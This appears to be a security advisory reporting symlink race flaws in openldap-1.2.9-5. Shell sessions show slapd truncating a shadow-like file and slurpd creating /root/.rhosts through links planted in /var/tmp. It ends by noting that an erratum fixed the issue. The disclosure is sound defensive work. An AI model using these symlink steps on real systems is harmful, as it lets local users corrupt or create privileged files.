I was trying out the new openldap package(openldap-1.2.9-5) and I noticed it blindly creates some files which follow symlinks and will overwrite any file without notification. For example: [root@king /]# ls -al /etc/shadow.test -r-------- 1 root root 780 Apr 10 21:02 /etc/shadow.test [root@king /]# ls -al /var/tmp total 3 drwxrwxrwt 2 root root 2048 Apr 10 20:55 . drwxr-xr-x 21 root root 1024 Apr 3 22:37 .. [root@king /]# ln -s /etc/shadow.test /var/tmp/NEXTID [root@king /]# ls -al /var/tmp total 3 drwxrwxrwt 2 root root 2048 Apr 10 20:55 . drwxr-xr-x 21 root root 1024 Apr 3 22:37 .. lrwxrwxrwx 1 root root 13 Apr 10 20:55 NEXTID -> /etc/shadow.test [root@king /]# /etc/rc.d/init.d/ldap start Starting ldap: [ OK ] [root@king /]# ls -al /etc/shadow.test -r-------- 1 root root 780 Apr 10 21:02 /etc/shadow.test [root@king /]# /etc/rc.d/init.d/ldap stop Shutting down ldap: [ OK ] [root@king /]# ls -al /etc/shadow.test -r-------- 1 root root 2 Apr 10 21:04 /etc/shadow.test [root@king /]# Apparently when slapd terminates it creates the file NEXTID in /var/tmp (actually it follows symlink from /usr/tmp). It will create and overwrite files. slurpd has a similar problem: [root@king /]# ls -al /root/.rhosts ls: /root/.rhosts: No such file or directory [root@king /]# ls -al /var/tmp total 3 drwxrwxrwt 2 root root 2048 Apr 10 20:59 . drwxr-xr-x 21 root root 1024 Apr 3 22:37 .. [root@king /]# slurpd No replicas in slapd config file "/etc/openldap/slapd.conf"! Error: : directory does not exist Error: /usr/tmp/slurpd.replog: directory does not exist Error: /usr/tmp/slurpd.status: directory does not exist [root@king /]# ls -al /var/tmp total 3 drwxrwxrwt 2 root root 2048 Apr 10 20:59 . drwxr-xr-x 21 root root 1024 Apr 3 22:37 .. -rw-r--r-- 1 root root 0 Apr 10 20:59 slurpd.status [root@king /]# [root@king /]# rm /var/tmp/slurpd.status [root@king /]# ln -s /root/.rhosts /var/tmp/slurpd.status [root@king /]# slurpd No replicas in slapd config file "/etc/openldap/slapd.conf"! Error: : directory does not exist Error: /usr/tmp/slurpd.replog: directory does not exist Error: /usr/tmp/slurpd.status: directory does not exist [root@king /]# ls -al /root/.rhosts -rw-r--r-- 1 root root 0 Apr 10 21:01 /root/.rhosts [root@king /]# slurpd to my knowledge will only create files, it will not overwrite or truncate previously existing files. Also after slapd is running if you type slurpd, it will try to read from /var/tmp/slurpd.status fail and then write to /var/tmp/slurpd.status.lock which can be a symlink to any file you wish to create and truncate any existing file to 0 bytes. There are other instances I noticed in the code such /tmp/slurpd.dump and other files that probably behanve the same. Not good. -Stan Bubrouski
Errata released that fixes the problem.